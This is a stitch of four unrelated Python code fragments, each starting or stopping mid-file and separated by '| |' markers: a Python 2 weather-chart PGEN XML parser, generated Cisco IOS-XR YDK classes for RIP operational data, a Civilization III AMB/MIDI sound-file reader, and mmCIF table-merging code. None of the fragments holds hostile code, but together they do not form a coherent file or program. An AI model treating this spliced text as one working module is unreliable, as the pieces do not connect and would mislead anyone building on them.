tree = ET.parse(fileName)
timePeriod = self._convertToTimeRange(t+'h')
# Get the Lines
for line in tree.iter("Line"):
drawable = self.Drawable()
pgenType = line.attrib.get('pgenType')
print "pgenType", pgenType
#pgenExcludeList = ["LINE_SOLID", "LINE_DASHED_6", "FILLED_ARROW", "POINTED_ARROW", "DRY_LINE", "General Text", "Contours", "None"]
pgenExcludeList = ["LINE_SOLID", "LINE_DASHED_6", "FILLED_ARROW", "POINTED_ARROW", "DRY_LINE", "Contours", "None"]
if pgenType in pgenExcludeList:
print "pgenType skipped:", pgenType
continue
drawable.drawableType = self._pgenTypeDecodeDict().get(pgenType)
drawable.timePeriod = timePeriod
drawable.latLons = self._getLatLons(line)
drawable.printDrawable()
drawables.append(drawable)
# Get the collections with Symbols
for collection in tree.iter("DECollection"):
for symbol in collection.iter("Symbol"):
drawable = self.Drawable()
pgenType = symbol.attrib.get('pgenType')
print "pgenType", pgenType
drawable.drawableType = self._pgenTypeDecodeDict().get(pgenType)
drawable.timePeriod = timePeriod
drawable.latLons = self._getLatLons(symbol)
for textline in collection.iter("textline"):
drawable.pressureTag = textline.text + " mb"
print "printing collection drawable"
drawable.printDrawable()
drawables.append(drawable)
return drawables
def _best_way(self, number):
if number%2==0:
return "even"
else:
return "odd"
def _getLatLons(self, node):
latLons = []
for point in node.findall("Point"):
lat = round(float(point.attrib.get("Lat")),1)
lat = int((lat + 0.25) * 2.0) / 2.0
lat = float(lat)
latmult = lat * 10
if (self._best_way(latmult)) == "even":
lat = int(lat)
lon = round(float(point.attrib.get("Lon")),1)
lon = int((lon + 0.25) * 2.0) / 2.0
lon = float(lon)
lonmult = lon * 10
if (self._best_way(lonmult)) == "even":
lon = int(lon)
# lat = float(point.attrib.get("Lat"))
# lon = float(point.attrib.get("Lon"))
latLons.append((lat, lon))
return latLons
def _associateDrawableElementWithFeature(self, drawableElement):
# Determine if the drawableElement can be associated with a feature
# If so, determine if is associated
found = False
latLons = drawableElement.latLons
for feature in self._features:
if feature.featureType not in ['Named']:
continue
for period in feature.periods:
if self._drawableElementOverlaps(period.areas, latLons):
period.drawables.append(drawableElement)
print "appending to period.drawables in associate"
found = True
return found
# TO DO -- complete this
def _compatibleDrawableTypes(self, d1, d2):
compatibleTypes = [('High', 'Ridge'), ('Trough', 'Low'), ('Tropical Wave', 'Low'), ('Low', 'Cold Front')]
t1 = d1.drawableType
t2 = d2.drawableType
if t1 == t2:
return True
if (t1, t2) in compatibleTypes or (t2, t1) in compatibleTypes:
return True
else:
return False
def _sampleData(self, argDict):
elements = self._analysisList(argDict)
periods = []
areaTuples = []
for feature in self._features:
if feature.featureType != 'Named':
continue
for period in feature.periods:
periods.append((period.timePeriod, 'timeLabel'))
for area in period.areas:
if area.refData:
editArea = area.refData
else:
editArea = area.areaName
areaTuples.append((editArea, area.areaLabel))
sampleInfo = (elements, periods, areaTuples)
#print "\nSampleInfo", sampleInfo
self._sampler = self.getSampler(argDict, sampleInfo)
print "Sampler", self._sampler
#####
def getSampler(self, argDict, sampleInfo, sampleFromServer=0):
# Get a HistoSampler given
# sampleInfo, which is a list of tuples, or just a single tuple
# of tuples ([elements], [periods], [areas])
# the elements are [(name, method)] -- basically the analysis list
# the periods [(timeRange, label)]
# areas [(name,label)] or | |
this interface
**type**\: bool
**config**\: False
.. attribute:: is_passive_interface
Passive interface indicator
**type**\: bool
**config**\: False
.. attribute:: multicast_address
Use broadcast address for v2 packets
**type**\: bool
**config**\: False
.. attribute:: accept_metric
Accept routes of metric 0 indicator
**type**\: bool
**config**\: False
.. attribute:: send_version
Versions that the interface is sending
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: receive_version
Versions that the interface will recieve
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: state
Current state of the interface
**type**\: :py:class:`InterfaceState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.InterfaceState>`
**config**\: False
.. attribute:: destination_address
IP Address of this interface
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix length of the IP address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric_cost
Cost added to routes through this interface
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: split_horizon
Split horizon enabled indicator
**type**\: bool
**config**\: False
.. attribute:: poison_horizon
Poisoned reverse enabled indicator
**type**\: bool
**config**\: False
.. attribute:: triggered_rip
Triggered RIP enabled indicator
**type**\: bool
**config**\: False
.. attribute:: neighbor_address
Interface's triggered RIP neighbor
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: oom_flags
Out\-of\-memory status flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: join_status
Multicast group join status
**type**\: bool
**config**\: False
.. attribute:: lpts_state
LPTSState
**type**\: bool
**config**\: False
.. attribute:: auth_mode
Authentication Mode
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_keychain
Authentication Keychain Name
**type**\: str
**config**\: False
.. attribute:: send_auth_key_exists
Authentication send key exists
**type**\: bool
**config**\: False
.. attribute:: auth_key_md5
Authentication key programmed with MD5 algorithm
**type**\: bool
**config**\: False
.. attribute:: auth_key_send_id
Current active Send Authentication Key Id
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: total_pkt_recvd
Total packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_wrong_kc
Packets dropped due to wrong keychain configured
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_no_auth
Packets dropped due to missing authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_invalid_auth
Packets dropped due to invalid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_accepted_valid_auth
Packets accepted with valid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rip_summary
User defined summary addresses
**type**\: list of :py:class:`RipSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary>`
**config**\: False
.. attribute:: rip_peer
Neighbors on this interface
**type**\: list of :py:class:`RipPeer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([("rip-summary", ("rip_summary", Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary)), ("rip-peer", ("rip_peer", Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('if_handle', (YLeaf(YType.str, 'if-handle'), ['str'])),
('rip_enabled', (YLeaf(YType.boolean, 'rip-enabled'), ['bool'])),
('is_passive_interface', (YLeaf(YType.boolean, 'is-passive-interface'), ['bool'])),
('multicast_address', (YLeaf(YType.boolean, 'multicast-address'), ['bool'])),
('accept_metric', (YLeaf(YType.boolean, 'accept-metric'), ['bool'])),
('send_version', (YLeaf(YType.uint32, 'send-version'), ['int'])),
('receive_version', (YLeaf(YType.uint32, 'receive-version'), ['int'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper', 'InterfaceState', '')])),
('destination_address', (YLeaf(YType.str, 'destination-address'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('metric_cost', (YLeaf(YType.uint32, 'metric-cost'), ['int'])),
('split_horizon', (YLeaf(YType.boolean, 'split-horizon'), ['bool'])),
('poison_horizon', (YLeaf(YType.boolean, 'poison-horizon'), ['bool'])),
('triggered_rip', (YLeaf(YType.boolean, 'triggered-rip'), ['bool'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str'])),
('oom_flags', (YLeaf(YType.uint32, 'oom-flags'), ['int'])),
('join_status', (YLeaf(YType.boolean, 'join-status'), ['bool'])),
('lpts_state', (YLeaf(YType.boolean, 'lpts-state'), ['bool'])),
('auth_mode', (YLeaf(YType.uint32, 'auth-mode'), ['int'])),
('auth_keychain', (YLeaf(YType.str, 'auth-keychain'), ['str'])),
('send_auth_key_exists', (YLeaf(YType.boolean, 'send-auth-key-exists'), ['bool'])),
('auth_key_md5', (YLeaf(YType.boolean, 'auth-key-md5'), ['bool'])),
('auth_key_send_id', (YLeaf(YType.uint64, 'auth-key-send-id'), ['int'])),
('total_pkt_recvd', (YLeaf(YType.uint32, 'total-pkt-recvd'), ['int'])),
('pkt_drop_wrong_kc', (YLeaf(YType.uint32, 'pkt-drop-wrong-kc'), ['int'])),
('pkt_drop_no_auth', (YLeaf(YType.uint32, 'pkt-drop-no-auth'), ['int'])),
('pkt_drop_invalid_auth', (YLeaf(YType.uint32, 'pkt-drop-invalid-auth'), ['int'])),
('pkt_accepted_valid_auth', (YLeaf(YType.uint32, 'pkt-accepted-valid-auth'), ['int'])),
])
self.interface_name = None
self.interface = None
self.if_handle = None
self.rip_enabled = None
self.is_passive_interface = None
self.multicast_address = None
self.accept_metric = None
self.send_version = None
self.receive_version = None
self.state = None
self.destination_address = None
self.prefix_length = None
self.metric_cost = None
self.split_horizon = None
self.poison_horizon = None
self.triggered_rip = None
self.neighbor_address = None
self.oom_flags = None
self.join_status = None
self.lpts_state = None
self.auth_mode = None
self.auth_keychain = None
self.send_auth_key_exists = None
self.auth_key_md5 = None
self.auth_key_send_id = None
self.total_pkt_recvd = None
self.pkt_drop_wrong_kc = None
self.pkt_drop_no_auth = None
self.pkt_drop_invalid_auth = None
self.pkt_accepted_valid_auth = None
self.rip_summary = YList(self)
self.rip_peer = YList(self)
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface, ['interface_name', 'interface', 'if_handle', 'rip_enabled', 'is_passive_interface', 'multicast_address', 'accept_metric', 'send_version', 'receive_version', 'state', 'destination_address', 'prefix_length', 'metric_cost', 'split_horizon', 'poison_horizon', 'triggered_rip', 'neighbor_address', 'oom_flags', 'join_status', 'lpts_state', 'auth_mode', 'auth_keychain', 'send_auth_key_exists', 'auth_key_md5', 'auth_key_send_id', 'total_pkt_recvd', 'pkt_drop_wrong_kc', 'pkt_drop_no_auth', 'pkt_drop_invalid_auth', 'pkt_accepted_valid_auth'], name, value)
class RipSummary(_Entity_):
"""
User defined summary addresses
.. attribute:: prefix
Summary address prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Summary address prefix length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: next_hop_address
Summary address next hop
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: metric
Summary metric
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary, self).__init__()
self.yang_name = "rip-summary"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('next_hop_address', (YLeaf(YType.str, 'next-hop-address'), ['str'])),
('metric', (YLeaf(YType.int32, 'metric'), ['int'])),
])
self.prefix = None
self.prefix_length = None
self.next_hop_address = None
self.metric = None
self._segment_path = lambda: "rip-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary, ['prefix', 'prefix_length', 'next_hop_address', 'metric'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface.RipSummary']['meta_info']
class RipPeer(_Entity_):
"""
Neighbors on this interface
.. attribute:: peer_uptime
Uptime of this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: peer_address
IP Address of this peer
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: peer_version
RIP version for this peer
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: discarded_peer_packets
Discarded packets from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: discarded_peer_routes
Discarded routes from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer, self).__init__()
self.yang_name = "rip-peer"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer_uptime', (YLeaf(YType.uint32, 'peer-uptime'), ['int'])),
('peer_address', (YLeaf(YType.str, 'peer-address'), ['str'])),
('peer_version', (YLeaf(YType.uint8, 'peer-version'), ['int'])),
('discarded_peer_packets', (YLeaf(YType.uint32, 'discarded-peer-packets'), ['int'])),
('discarded_peer_routes', (YLeaf(YType.uint32, 'discarded-peer-routes'), ['int'])),
])
self.peer_uptime = None
self.peer_address = None
self.peer_version = None
self.discarded_peer_packets = None
self.discarded_peer_routes = None
self._segment_path = lambda: "rip-peer"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer, ['peer_uptime', 'peer_address', 'peer_version', 'discarded_peer_packets', 'discarded_peer_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface.RipPeer']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.Vrfs.Vrf.Interfaces']['meta_info']
class Global(_Entity_):
"""
Global Information
.. attribute:: vrf_summary
VRF summary data
**type**\: :py:class:`VrfSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Global.VrfSummary>`
**config**\: False
.. attribute:: interface_summary
List of Interfaces configured
**type**\: list of :py:class:`InterfaceSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.Vrfs.Vrf.Global.InterfaceSummary>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.Vrfs.Vrf.Global, self).__init__()
self.yang_name = "global"
self.yang_parent_name = "vrf"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("vrf-summary", ("vrf_summary", Rip.Vrfs.Vrf.Global.VrfSummary)), ("interface-summary", ("interface_summary", Rip.Vrfs.Vrf.Global.InterfaceSummary))])
self._leafs = OrderedDict()
self.vrf_summary = Rip.Vrfs.Vrf.Global.VrfSummary()
self.vrf_summary.parent = self
self._children_name_map["vrf_summary"] = "vrf-summary"
self.interface_summary = YList(self)
self._segment_path = lambda: "global"
self._is_frozen = | |
###
###
###
### AMBReader.py is a script I've been using to explore & experiment with AMB files. In the process I've also built it up as an AMB reader, though
### it's by no means a user friendly format loading library.
### BASIC USAGE: First set civ3_root_dir below to your Civ 3 install directory. Then run the script in interactive mode (py -i AMBReader.py). It will
### automatically load all AMBs from your vanilla, PTW, and Conquests installs. You can look up an AMB by name using the "find_amb" method and print
### out its contents using its "describe" method. For example, try:
### >>> find_amb("TrebuchetRun").describe()
###
###
###
civ3_root_dir = "C:\\GOG Games\\Civilization III Complete\\"
import os
civ3_unit_art_paths = [os.path.join (civ3_root_dir , "Art", "Units"),
os.path.join (civ3_root_dir, "civ3PTW" , "Art", "Units"),
os.path.join (civ3_root_dir, "Conquests", "Art", "Units")]
def read_string (_file):
tr = b""
while True:
byte = _file.read (1)
if byte[0] != 0:
tr += byte
else:
break
return tr.decode ()
def read_amb_int (_file, unsigned = True):
return int.from_bytes (_file.read (4), byteorder = "little", signed = not unsigned)
def read_midi_int (_file, unsigned = True):
return int.from_bytes (_file.read (4), byteorder = "big", signed = not unsigned)
def read_midi_short (_file, unsigned = True):
return int.from_bytes (_file.read (2), byteorder = "big", signed = not unsigned)
# Reads a "variable length quantity", which is an int made up of a variable number of bytes. Each byte contains 7 bits of the int and the 8th
# (highest) bit determines whether or not the next byte is included as well.
def read_midi_var_int (_file):
tr = 0
while True:
bs = _file.read (1)
if len (bs) > 0:
tr = (tr << 7) + (bs[0] & 0x7F)
if (bs[0] & 0x80) == 0:
return tr
else:
raise Exception ("Unexpected EOF in variable length quantity")
# assert 0 == read_midi_var_int (b"\x00")
# assert 0x40 == read_midi_var_int (b"\x40")
# assert 0x7F == read_midi_var_int (b"\x7F")
# assert 0x80 == read_midi_var_int (b"\x81\x00")
# assert 0x2000 == read_midi_var_int (b"\xC0\x00")
# assert 0x3FFF == read_midi_var_int (b"\xFF\x7F")
# assert 0x4000 == read_midi_var_int (b"\x81\x80\x00")
# assert 0x100000 == read_midi_var_int (b"\xC0\x80\x00")
# assert 0x1FFFFF == read_midi_var_int (b"\xFF\xFF\x7F")
# assert 0x200000 == read_midi_var_int (b"\x81\x80\x80\x00")
# assert 0x8000000 == read_midi_var_int (b"\xC0\x80\x80\x00")
# assert 0xFFFFFFF == read_midi_var_int (b"\xFF\xFF\xFF\x7F")
class Prgm:
def __init__ (self, amb_file):
# Size does not include the type tag or size field itself. The AMB reader code checks if size == 0x1C, implying it's possible for prgm chunks
# to have no strings, but in fact all prgm chunks in Civ 3 do have strings (at least the first prgm chunks in each file do).
self.size = read_amb_int (amb_file)
# PRGM chunk number, equals n where this is the n-th PRGM chunk in the file. There is ONE exception to this rule: in ChariotAttack.amb, the
# 8th PRGM chunk has number 5.
self.number = read_amb_int (amb_file)
# Observations about dat fields, by index:
# 0. One of [0, 1, 2, 3]. 3 is the most common
# 1. One of [0, 20, 100, 150, 200]. 200 is the most common. 20 occurs once, in PikemanAttackA.amb.
# 2. Looks like most values are negative
# 3. One of [0, 25, 127, 1237]. 1237 occurs once, in JaguarWarriorDeath.amb.
# 4. One of [0, 10, 127, 75, 785]. 75 is the most common.
# 1 & 2 are upper and lower bounds for randomized pitch/tempo. +/- 100 points corresponds to about +/- 6%.
self.dat = []
for n in range(5):
self.dat.append (read_amb_int (amb_file, unsigned = False))
if read_amb_int (amb_file) != 0xFA:
raise Exception ("Expected (0x FA 00 00 00) before strings in Prgm chunk in \"" + amb_file + "\"")
self.str1 = read_string (amb_file)
self.str2 = read_string (amb_file)
def describe (self):
print ("\tprgm\t" + "\t".join ([str (d) for d in self.dat]) + "\t'" + self.str1 + "' '" + self.str2 + "'")
class KmapItem:
def __init__ (self, amb_file, int2, int6):
if (int2 & 6) == 0: # False for all AMBs in Civ 3
self.Aint1 = read_amb_int (amb_file)
self.Aint2 = read_amb_int (amb_file)
else:
self.Bdat1 = amb_file.read (int6) # Always 0x (7F 00 00 00 00 00 00 00 01 00 00 00)
self.str1 = read_string (amb_file)
def get_description (self):
return str (self.Bdat1) + " '" + self.str1 + "'"
class Kmap:
def __init__ (self, amb_file):
self.size = read_amb_int (amb_file)
self.int2 = read_amb_int (amb_file) # flags? Equals 2 for all Kmap chunks in all files
self.int3 = read_amb_int (amb_file) # Always zero
self.int4 = read_amb_int (amb_file) # Always zero
self.str1 = read_string (amb_file)
self.int5 = read_amb_int (amb_file) # item count
if (self.int2 & 6) != 0: # True for all AMBs in Civ 3
self.int6 = read_amb_int (amb_file) # Always 12
else:
self.int6 = None
# In all Civ 3 AMBs, there are 3 chunks with 0 items and all the rest have 1 item
self.items = []
for n in range(self.int5):
self.items.append(KmapItem(amb_file, self.int2, self.int6))
if read_amb_int (amb_file) != 0xFA:
raise Exception ("Expected (0x FA 00 00 00) at end of Kmap chunk in \"" + amb_file + "\"")
def describe (self):
item_descriptions = [i.get_description () for i in self.items]
print ("\tkmap\t" + "{}\t{}\t{}\t'{}'\t{}\t{}\t{}".format (self.int2, self.int3, self.int4, self.str1, self.int5, self.int6, str (item_descriptions)))
class Glbl:
def __init__ (self, amb_file):
self.size = read_amb_int (amb_file)
tell0 = amb_file.tell()
self.int2 = read_amb_int (amb_file) # Always 12
self.dat1 = amb_file.read (self.int2) # Always 0x (00 00 00 00 00 00 00 00 CD CD CD CD)
# Dump the rest of the chunk into dat2 for now. The decompiled code to read the rest of the chunk is really weird and maybe corrupt.
# Dat2 is empty for all chunks in all files
self.dat2 = amb_file.read (self.size - (amb_file.tell() - tell0))
def describe (self):
print ("\tglbl\t" + str (self.int2) + "\t" + str (self.dat1) + "\t" + str (self.dat2))
class MidiTrackName:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
length = read_midi_var_int (midi_file)
self.name = midi_file.read (length).decode ("utf-8")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tTrackName '{}'".format (timestamp, self.name))
class MidiSMPTEOffset:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.hr = int.from_bytes(midi_file.read (1), "big")
self.mn = int.from_bytes(midi_file.read (1), "big")
self.se = int.from_bytes(midi_file.read (1), "big")
self.fr = int.from_bytes(midi_file.read (1), "big")
self.ff = int.from_bytes(midi_file.read (1), "big")
def describe (self, timestamp):
contents = " ".join ([str(v) for v in [self.hr, self.mn, self.se, self.fr, self.ff]])
print ("\t\t\t{:01.3f}\tSMPTEOffset {}".format (timestamp, contents))
class MidiTimeSignature:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.nn = int.from_bytes(midi_file.read (1), "big")
self.dd = int.from_bytes(midi_file.read (1), "big")
self.cc = int.from_bytes(midi_file.read (1), "big")
self.bb = int.from_bytes(midi_file.read (1), "big")
def describe (self, timestamp):
contents = " ".join ([str(v) for v in [self.nn, self.dd, self.cc, self.bb]])
print ("\t\t\t{:01.3f}\tTimeSignature {}".format (timestamp, contents))
class MidiSetTempo:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.microseconds_per_quarter_note = int.from_bytes(midi_file.read (3), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tSetTempo {}".format (timestamp, self.microseconds_per_quarter_note))
class MidiEndOfTrack:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tEndOfTrack".format (timestamp))
def is_midi_meta_event (event):
t = type (event)
return (t == MidiTrackName) or (t == MidiSMPTEOffset) or (t == MidiTimeSignature) or (t == MidiSetTempo) or (t == MidiEndOfTrack)
class MidiControlChange:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.controller_number = int.from_bytes (midi_file.read (1), "big")
if self.controller_number >= 122:
raise Exception ("This is actually a channel mode message")
self.value = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tControlChange {} {} {}".format (timestamp, self.channel_number, self.controller_number, self.value))
class MidiProgramChange:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.program_number = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tProgramChange {} {}".format (timestamp, self.channel_number, self.program_number))
class MidiNoteOff:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.key = int.from_bytes (midi_file.read (1), "big")
self.velocity = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tNoteOff {} {} {}".format (timestamp, self.channel_number, self.key, self.velocity))
class MidiNoteOn:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.key = int.from_bytes (midi_file.read (1), "big")
self.velocity = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print | |
if column not in cif_table.columns:
continue
try:
ctx = self.cif_data[table_name]
except KeyError:
continue
## dictionary of [primary_key_value] = cif_row
primary_values = {}
for crx in ctx:
try:
value = crx[column]
except KeyError:
pass
else:
primary_values[value] = crx
for cif_row in cif_table:
try:
value = cif_row[column]
crx = primary_values[value]
except KeyError:
continue
self.log("%s: file primary value %s=%s conflicts with "\
"merged values" % (cif_data.file.path, tag, value))
## check cif_row with crx, if cif_row has no conflicting
## column values, then the row will cleanly merge in
## and nothing needs to be done
will_merge = True
for (col, val) in cif_row.items():
if crx.has_key(col) == False:
continue
if crx[col] != val:
will_merge = False
break
if will_merge == True:
continue
## after a lot of thought, this seems to make sense
prefix = cif_table.data.file.path.replace(".","_")
new_value = "%s%s" % (prefix, value)
self.change_root_value(
cif_data, table_name, column, value, new_value)
def create_unused_primary_key(self, table_name, primary_column):
"""Assume primary keys are numeric, return the lowest unused
primary key in the cif_table.
"""
try:
ctx = self.cif_data[table_name]
except KeyError:
return "1"
else:
primary_keys = self.get_column_values(ctx, primary_column)
new_key = 1
while str(new_key) in primary_keys:
new_key += 1
return str(new_key)
def make_comare_accelerator(self, cif_row, columns):
"""Returns a tuple of the values in cif_row in the order of columns.
For rows which do not have data for a column, the special class
Any() is created which compares True against any value.
merge_accel: (cif_row[column1], cif_row[column2], ...)
"""
merge_accel = []
for column in columns:
merge_accel.append(cif_row.get(column, Any()))
## last item is a special Any() with a reference to the row
any = Any()
any.cif_row = cif_row
merge_accel.append(any)
return tuple(merge_accel)
def do_cif_row_merge(self, crx, cif_row, columns):
"""Merge the given columns of cif_row2 into cif_row1.
"""
log_merged_columns = []
for column in columns:
value = crx.get(column)
if value == None or value == "" or value == "?" or value == ".":
try:
crx[column] = cif_row[column]
except KeyError:
pass
else:
log_merged_columns.append(column)
if column not in crx.table.columns:
crx.table.columns.append(column)
## log what happened, return
if len(log_merged_columns) > 0:
i = crx.table.index(crx)
self.log("%s: merged columns=%s into existing row=%d" % (
crx.table.name, string.join(log_merged_columns, ","), i))
else:
i1 = crx.table.index(crx)
i2 = cif_row.table.index(cif_row)
self.log("%s: table %s duplicate row=%d file row=%d" % (
cif_row.table.data.file.path, crx.table.name, i1, i2))
def merge_cif_row(self, ctx, cif_row, columns):
"""Adds the cif_row to the cif_table after checking to see if the
row is a duplicate, or a near duplicate with extra columns. If
the cif_row matches a cif_row already in the cif_table, only the
new columns are merged into the existing row. Returns 1 if the
row was appended to the table, and returns 0 if the row values were
merged, or if the row was an exact match with an existing row.
"""
merge_accel = self.make_comare_accelerator(cif_row, columns)
match_found = False
for accel in self.merge_accel_list:
if accel == merge_accel:
match_found = True
break
if match_found == True:
## CASE 1
## there is a row which matches this row already in the table
## merge any extra columns of data this row may have into
## the matching row
crx = accel[-1].cif_row
self.do_cif_row_merge(crx, cif_row, columns)
self.merge_accel_list.remove(accel)
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
return 0
else:
## CASE 2:
## if we get here, then the row does not match any
## other row and should be appended
crx = copy.deepcopy(cif_row)
ctx.append(crx)
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
return 1
def merge_cif_table(self, cif_table, columns):
"""Merge the given columns of the cif_table.
"""
## the accelerator must be blanked for each new table
## to be merged
self.merge_accel_list = []
try:
ctx = self.cif_data[cif_table.name]
except KeyError:
## create new table if necessary
ctx = mmCIFTable(cif_table.name, copy.deepcopy(cif_table.columns))
self.cif_data.append(ctx)
